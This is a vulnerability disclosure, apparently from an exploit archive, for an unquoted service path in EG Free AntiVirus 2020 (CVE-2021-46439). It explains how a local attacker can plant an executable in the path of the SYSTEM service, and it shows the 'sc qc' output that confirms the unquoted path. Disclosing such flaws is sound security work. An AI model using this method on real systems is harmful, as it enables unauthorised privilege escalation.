EG Free AntiVirus 2020 Privilege Escalation / Unquoted Service Path

EG Free AntiVirus version 2020 suffers from an unquoted service path vulnerability that can lead to privilege escalation.


MD5 | 1f237a69cc97f9cb11c0109dcc192e3e

# Exploit Title: EG Free AntiVirus v2020 - Unquoted Service Path (Local Privilege Escalation)
# Date: 24/01/2022
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: http://www.egsoftweb.in/index.aspx
# Software Link: http://www.egsoftweb.in/OurProduct_Readmore.aspx?id=6
# Version: 2020
# Tested: Windows 10 (x64)
# CVE: CVE-2021-46439

-------------
Description:
-------------

EG Free AntiVirus (v2020) installs a service (WinSEGAV AutoConfig) with
an unquoted service path. Since this service is running as SYSTEM, it
creates a local privilege escalation vulnerability. To properly exploit
this vulnerability, a local attacker must insert an executable in the
path of the service. Rebooting the system or restarting the service
will run the malicious executable with elevated privileges.

------------------
Proof of Concept:
------------------

C:\Users\shah>sc qc “WinSEGAV AutoConfig”
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WinSEGAV AutoConfig
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\EGSoftWeb\EG Anti
Virus\egavser.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Windows Service For EG Free AntiVirus
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


Best regards,
Shahrukh Iqbal Mirza.

Related Posts